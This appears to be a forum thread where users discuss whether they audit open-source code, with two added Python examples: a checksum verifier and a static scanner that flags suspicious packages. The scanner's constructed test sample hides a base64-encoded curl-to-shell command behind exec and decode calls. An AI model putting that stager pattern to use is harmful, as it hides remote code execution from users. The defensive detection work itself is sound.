cross-posted from: https://lemmy.ml/post/30846701
The question is simple. I wanted to get a general consensus on whether people actually audit the code that they use from FOSS or open source software or apps.
Do you blindly trust the FOSS community? I am trying to get a rough idea here. Sometimes audit the code? Only on mission critical apps? Not at all?
Let’s hear it!
Yes. I have various ways I check, including reading the source code, looking for open known vulnerabilities, and reviewing recent commit history to see if it’s still actively maintained.
And… Looking at the other replies here - you’re all welcome, I guess. Yes. I am that part of the community. We exist. There may be dozens of us…
Anyway. Thank you all for all you do in the community, too. High fives all around.
I wouldn’t say blindly, rather my heuristic is, the more long-term and popular a project is, the less I’ll bother.
If I do though get a random script from a random repository, rather than from, say, the Debian official package manager from main or contrib sources, then I will check. If it’s another repository, say Firefox from Mozilla or Blender, then I won’t check but I’ll make sure it genuinely comes from there, maybe not a mirror, or that the mirror does have a checksum that gets validated.
So… investment in verifying trust is roughly proportional to how little I expect others to check.
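The "checksum that gets validated" step from the reply above, as an added example that is not part of the original post or of any project's own code: it parses a SHA256SUMS-style list as written by `sha256sum`, hashes the downloaded file in chunks, and compares on the exact file name. The tarball, the sums text and the tampered copy are all constructed in a temporary directory; `tool-1.2.3.tar.gz` is a made-up name.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path

HEX = set("0123456789abcdefABCDEF")


def sha256_of(path):
    """Stream the file through SHA-256 so large tarballs don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_sums(text):
    """Parse the '<hex>  <name>' lines written by `sha256sum`; '*name' marks binary mode.

    Returns {filename: lowercase_hex}. Malformed lines are skipped, not trusted."""
    sums = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        digest, name = parts
        if len(digest) != 64 or any(c not in HEX for c in digest):
            continue
        sums[name.lstrip("*")] = digest.lower()
    return sums


def verify_download(artifact, sums_text):
    """Return 'ok', 'MISMATCH' or 'not-listed' for artifact against a SHA256SUMS body.

    Matching on the exact file name matters: a mirror serving a renamed or extra
    file should not pass just because some digest somewhere in the list matches."""
    artifact = Path(artifact)
    expected = parse_sums(sums_text).get(artifact.name)
    if expected is None:
        return "not-listed"
    actual = sha256_of(artifact)
    return "ok" if hmac.compare_digest(actual, expected) else "MISMATCH"


def demo():
    """Constructed files standing in for a release tarball and the project's SHA256SUMS."""
    with tempfile.TemporaryDirectory() as d:
        tarball = Path(d) / "tool-1.2.3.tar.gz"
        tarball.write_bytes(b"constructed tarball contents, not a real release\n")
        sums_text = f"{sha256_of(tarball)}  tool-1.2.3.tar.gz\n"

        clean = verify_download(tarball, sums_text)
        # simulate a mirror that swapped the archive but kept the file name
        tarball.write_bytes(b"constructed tarball contents, with one extra byte!\n")
        tampered = verify_download(tarball, sums_text)
        # a file the official list never mentioned
        stray = Path(d) / "tool-1.2.4.tar.gz"
        stray.write_bytes(b"x")
        unlisted = verify_download(stray, sums_text)
        return clean, tampered, unlisted


if __name__ == "__main__":
    print(demo())  # ('ok', 'MISMATCH', 'not-listed')
```

The check only means something if the sums text itself was fetched from the official source (or carries a signature you verify against the project's key) rather than from the same mirror as the archive; a mirror that can swap the tarball can just as easily rewrite a sums file sitting next to it.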
I’ve worked on FOSS stuff with very large user bases and seen very obvious flaws go unnoticed for several years, so I guess most people don’t.
So the whole thing about FOSS is that at its core, someone could add malicious features or whatever to a codebase, but it can be discovered if people notice adverse effects and dig into it.
Like that one supply chain attack by “Jia Tan” on xz tools, that was quite nefarious, well planned and executed, yet some nerd noticed a slightly longer than normal response time and looked into it (a gross simplification, some luck might have been involved but you get the point). If it were a closed-source proprietary tool, the owners would shrug their shoulders and gaslight people into believing it’s nothing.
That’s why people make a fuss about binary blobs in FOSS code, if anything unwanted was happening, it could always be from there.
My personal level of checking is ensuring that I have gone to the correct official source, but I will generally have to trust the builder that was linked from that source did not modify or inject anything.
I don’t. I just hope for the best and try to install as few things as possible.
I’m focussing on disaster recovery now, more than prevention. Prevention seems like it’s almost impossible in this age.
EDIT: I mistakenly answered based on security, not privacy.
If it’s a package I’m not familiar with and is relatively small/unknown then I’ll give it a brief once over to see if there’s anything that sticks out (obfuscated code, making http requests when the package should never do that, etc.). Most of the time though it is just trusting the FOSS community.
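The "brief once over" described in the reply above, as an added example that is neither the poster's code nor any project's: a small `ast`-based pass that flags the things listed there (network imports in a package that should never talk to the network, `exec`/`eval`, decoder calls, and long base64-shaped string literals). The two source strings are constructed samples; `203.0.113.9` is a documentation address, and the "stager" is inert text that is only parsed, never executed.

```python
import ast
import base64
import re

# Modules a library with no stated network purpose has little reason to import
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "httpx", "aiohttp",
                   "ftplib", "smtplib", "telnetlib", "xmlrpc"}
PROCESS_MODULES = {"subprocess", "ctypes"}
DYNAMIC_CODE = {"exec", "eval", "compile", "__import__"}
DECODERS = {"b64decode", "b32decode", "a85decode", "b85decode", "unhexlify", "decompress"}
B64_SHAPE = re.compile(r"[A-Za-z0-9+/=]{40,}")


def looks_like_payload(s):
    """Long literal made only of base64 characters that mixes upper, lower and digits."""
    return (B64_SHAPE.fullmatch(s) is not None
            and any(c.isupper() for c in s)
            and any(c.islower() for c in s)
            and any(c.isdigit() for c in s))


class OnceOver(ast.NodeVisitor):
    def __init__(self, expect_network):
        self.expect_network = expect_network
        self.findings = []   # (line, kind, detail)

    def note(self, node, kind, detail):
        self.findings.append((node.lineno, kind, detail))

    def visit_Import(self, node):
        for alias in node.names:
            self.check_module(node, alias.name)

    def visit_ImportFrom(self, node):
        self.check_module(node, node.module or "")

    def check_module(self, node, name):
        root = name.split(".")[0]
        if root in NETWORK_MODULES and not self.expect_network:
            self.note(node, "network-import", name)
        if root in PROCESS_MODULES:
            self.note(node, "process-or-native", name)

    def visit_Call(self, node):
        f = node.func
        if isinstance(f, ast.Name) and f.id in DYNAMIC_CODE:
            self.note(node, "dynamic-code", f.id)
        elif isinstance(f, ast.Attribute) and f.attr in DECODERS:
            self.note(node, "decode-payload", f.attr)
        self.generic_visit(node)   # keep descending: exec(base64.b64decode(...)) nests both

    def visit_Constant(self, node):
        if isinstance(node.value, str) and looks_like_payload(node.value):
            self.note(node, "suspicious-literal", node.value[:16] + "...")


def once_over(source, expect_network=False):
    """Return sorted (line, kind, detail) findings for one module's source text."""
    v = OnceOver(expect_network)
    v.visit(ast.parse(source))
    return sorted(v.findings)


# Constructed sample: a 'string padding' helper that hides an inert stager in a literal
_PAYLOAD = base64.b64encode(
    b"import os\nos.system('curl http://203.0.113.9/x | sh')\n").decode()

SUSPICIOUS = f'''
import base64
import socket

_P = "{_PAYLOAD}"

def pad(s, n):
    return s.ljust(n)

def _init():
    exec(base64.b64decode(_P))

_init()
'''

# Constructed sample: the same kind of helper with nothing to hide
BENIGN = '''
import re

def pad(s, n):
    return s.ljust(n)

def slug(s):
    return re.sub("[^a-z0-9]+", "-", s.lower()).strip("-")
'''


if __name__ == "__main__":
    for finding in once_over(SUSPICIOUS):
        print(finding)
    print("benign:", once_over(BENIGN))
```

A pass like this is a triage aid, not an audit: it tells you where to read first, and `expect_network=True` exists precisely because an HTTP client library importing `socket` is not a finding. Anything it misses (a payload assembled from short fragments, an import done through `importlib`) still needs the human once-over the reply describes.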
Not a dev here so I have to trust what I’m hosting on my server…
I do check the issue section and base my opinion on how healthy a repo is and how long it hasn’t been updated.
Basing it on popularity also helps a bit? I check how sane their docker-compose is, how complicated it is, and what closed-source things they integrate into the image, but that’s it!
However, on Android I do some app analysis with PCAPdroid to check what strange communication is happening behind the scenes.
No.
I’ll just hope there’s a nerd out there protecting me by verifying the source code.
You can’t expect everyone to do their own research, but general rule of thumb:
Open Source > Closed Source
Just as: Democracy > Autocracy
I don’t have any of the knowledge to be able to do it.
I just hope that others who do, and are interested in the app, are doing their part.
Not at all unfortunately. I’m not a programmer though.
Truth be told, I’ve very rarely specifically audited the code of projects I use. Sometimes when something is broken or is missing a feature, I will go in and try to remedy that. On a couple of occasions I’ve noticed other bugs that I then fixed too.
The only exception to that are when I’m using some random script I’ve found on the internet - I will read through it to see what it does. This is somewhere between “software I download” and “copy-paste development”, as I will often also tweak the script to suit my needs better.
I don’t think it’s humanly possible for a single person to audit everything they are using. There are millions (perhaps even hundreds of millions?) of SLOC in any desktop Linux installation; it would take decades of effort to even skim all that for obvious faults, let alone properly audit it. If you are crazy enough to use something like Dusk OS, then I could see it, but how many people are?
Nah. I trust open source devs with all my heart. If anything goes wrong then I’ll think about it.
I’ve glanced over a project or two before. It’s usually less an audit, and more of a ‘what is going on in there?’ curiosity.
Though it does have the side-effect of being a low-intensity audit as well. :)
Click file “Yup, looks like code all right”
I don’t really care about low quality code as long as it’s still the best tool for the job. I blindly trust that any malicious code in popular software would quickly be called out.
The more niche, the more likely I feel like first investigating what exactly it does before I download.
Realistically I would probably not be able to tell without consulting an LLM though.
I’ve reviewed code, in particular I’ve looked over merge requests on occasion but mostly out of academic interest than being very concerned over security. Just want to see how people accomplish a task. Learning.
I’ve monitored network traffic just because sometimes I just want to do that rather than paranoia. Practice and learning.
I’ve run code through a local sonarqube instance and whatever other scanning software I feel like trying along with building applications from source but again it’s not from paranoia but for personal interest that’s mostly just making sure I’m in practice of being able to do so.
I’m not a security professional so I don’t have the background and experience to really notice things that can be problematic like people I know who have a career directly cyber-net-etc-security related rather than my tangential
So really I don’t audit code. At least not huge codebases. When it’s just a few 100-line files of Python to accomplish something, I’ll read them. There’s usually a requirements.txt in there though, pulling in pip packages, and I know I haven’t audited the dependencies. At work there are standards handled by people whose job it is to determine whether the code you’ve written and its dependencies pass the minimum to be deployable to computers on the network, and that too is mostly handled by security scanning software, both open source and closed commercial software.